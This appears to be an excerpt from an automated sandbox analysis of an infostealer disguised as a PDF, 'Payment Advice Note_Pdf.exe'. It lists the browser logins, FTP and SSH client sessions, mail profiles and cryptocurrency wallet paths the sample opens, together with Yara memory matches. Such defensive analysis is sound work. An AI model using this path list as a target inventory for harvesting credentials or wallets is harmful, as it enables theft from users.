Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406041
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.1404635132.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTCMv
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Electrum\wallets\\ectrum.dattubsystem\Profiles\Outlooka
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storage\*\*
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NC:\Users\user\AppData\Roaming\Exodus\\keystore\\\.dll
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\ts\U
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus Eden\*t
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus Eden\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1353774402.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1428296777.0000000036140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR